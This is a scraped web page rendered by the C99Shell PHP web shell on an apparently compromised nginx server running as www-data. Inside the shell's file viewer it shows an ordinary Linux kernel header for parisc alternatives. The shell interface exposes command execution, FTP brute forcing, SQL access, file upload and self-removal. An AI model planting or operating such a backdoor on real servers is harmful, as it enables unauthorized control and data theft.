!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-oracle-5.13-headers-5.13.0-1018/arch/parisc/include/asm/   drwxr-xr-x
Free 83.26 GB of 96.73 GB (86.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     alternative.h (1.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef __ASM_PARISC_ALTERNATIVE_H
#define __ASM_PARISC_ALTERNATIVE_H

#define ALT_COND_ALWAYS        0x80    /* always replace instruction */
#define ALT_COND_NO_SMP        0x01    /* when running UP instead of SMP */
#define ALT_COND_NO_DCACHE    0x02    /* if system has no d-cache  */
#define ALT_COND_NO_ICACHE    0x04    /* if system has no i-cache  */
#define ALT_COND_NO_SPLIT_TLB    0x08    /* if split_tlb == 0  */
#define ALT_COND_NO_IOC_FDC    0x10    /* if I/O cache does not need flushes */
#define ALT_COND_RUN_ON_QEMU    0x20    /* if running on QEMU */

#define INSN_PxTLB    0x02        /* modify pdtlb, pitlb */
#define INSN_NOP    0x08000240    /* nop */

#ifndef __ASSEMBLY__

#include <linux/init.h>
#include <linux/types.h>
#include <linux/stddef.h>
#include <linux/stringify.h>

struct alt_instr {
    s32 orig_offset;    /* offset to original instructions */
    s32 len;        /* end of original instructions */
    u32 cond;        /* see ALT_COND_XXX */
    u32 replacement;    /* replacement instruction or code */
};

void set_kernel_text_rw(int enable_read_write);
void apply_alternatives_all(void);
void apply_alternatives(struct alt_instr *start, struct alt_instr *end,
    const char *module_name);

/* Alternative SMP implementation. */
#define ALTERNATIVE(cond, replacement)        "!0:"    \
    ".section .altinstructions, \"aw\"    !"    \
    ".word (0b-4-.), 1, " __stringify(cond) ","    \
        __stringify(replacement) "    !"    \
    ".previous"

#else

/* to replace one single instructions by a new instruction */
#define ALTERNATIVE(from, to, cond, replacement)\
    .section .altinstructions, "aw"    !    \
    .word (from - .), (to - from)/4    !    \
    .word cond, replacement        !    \
    .previous

/* to replace multiple instructions by new code */
#define ALTERNATIVE_CODE(from, num_instructions, cond, new_instr_ptr)\
    .section .altinstructions, "aw"    !    \
    .word (from - .), -num_instructions !    \
    .word cond, (new_instr_ptr - .)    !    \
    .previous

#endif  /*  __ASSEMBLY__  */

#endif /* __ASM_PARISC_ALTERNATIVE_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0041 ]--